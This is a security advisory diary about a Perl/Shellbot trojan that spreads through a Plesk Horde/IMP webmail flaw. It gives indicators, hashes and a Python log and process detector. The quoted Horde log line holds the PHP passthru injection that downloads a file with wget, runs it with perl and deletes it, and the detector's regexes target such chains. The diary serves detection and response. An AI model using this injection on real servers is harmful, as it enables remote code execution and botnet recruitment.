Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on VirusTotal [2], and the script contains a “hostauth” of sosick[.]net[3]. The IRC server where the compromised systems are connecting to is located at What we have so far, it appears it is exploiting an older version of Plesk.


This bot exploits a vulnerability in Horde/IMP Plesk webmail. You might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info, which appears to be exploiting a Plesk [4] vulnerability and maybe others to connect to which a lot of activity has been reported to DShield for the past 3 days.

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget;perl himad.png;rm -rf himad.png*"); ?> [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely going to see similar Apache processes:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png
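
The two checks described above (PHP code in the username field of a Horde/IMP failed login, and a web-server-owned shell chaining a download into perl under /var/tmp), written as an added Python example that is not part of the original diary. The regexes, the extra account names www-data and nobody, and the benign sample lines are assumptions constructed for illustration.

```python
import re

# Horde/IMP failed-login entry; the "user" group is attacker-controlled text.
HORDE_LOGIN = re.compile(r"\[imp\] FAILED LOGIN to \S+ as (?P<user>.*) \[on line \d+ of")
# PHP open tags or command-execution calls have no place in an account name.
PHP_MARKERS = re.compile(r"<\?(php|=)|\b(passthru|system|shell_exec|exec|popen|eval)\s*\(", re.I)

# ps line for a shell owned by a web-server account (www-data/nobody are assumed extras).
PS_SHELL = re.compile(r"^(?P<user>apache|www-data|nobody)\s+(?P<pid>\d+)\s.*?\bsh -c (?P<cmd>.*)$")
# cd into a temp directory, then a downloader, then perl: the chain seen in this diary.
DROP_CHAIN = re.compile(r"cd\s+/(?:var/)?tmp\b.*\b(?:wget|curl)\b.*\bperl\b")

def suspicious_horde_logins(lines):
    """Return the username field of each failed login that carries PHP code."""
    hits = []
    for line in lines:
        m = HORDE_LOGIN.search(line)
        if m and PHP_MARKERS.search(m.group("user")):
            hits.append(m.group("user"))
    return hits

def suspicious_web_procs(ps_lines):
    """Return (user, pid) for web-server-owned shells running the download chain."""
    hits = []
    for line in ps_lines:
        m = PS_SHELL.match(line)
        if m and DROP_CHAIN.search(m.group("cmd")):
            hits.append((m.group("user"), int(m.group("pid"))))
    return hits

IMP = '[on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]'
SAMPLE_LOG = [
    # Entry quoted in the diary (the wget argument is absent there too).
    'Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as '
    '<?php passthru("cd /var/tmp;cd /var/tmp;wget;perl himad.png;rm -rf himad.png*"); ?> ' + IMP,
    # Constructed benign entry: an ordinary mistyped password.
    'Oct 26 12:01:07 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as '
    'alice@example.com ' + IMP,
]
SAMPLE_PS = [
    # First two lines are from the diary; the third is a constructed benign worker.
    "apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;"
    "cd /var/tmp;wget;perl himad.png;rm -rf himad.png*",
    "apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget",
    "apache   10800  0.0  0.1  51200  4096 ?        S    11:10   0:00 /usr/sbin/httpd",
]

if __name__ == "__main__":
    print(suspicious_horde_logins(SAMPLE_LOG))
    print(suspicious_web_procs(SAMPLE_PS))
```

Feed the first function the Horde log and the second the output of `ps aux`; a hit in either is a reason to check /var/tmp for a file matching the hashes above.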



Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

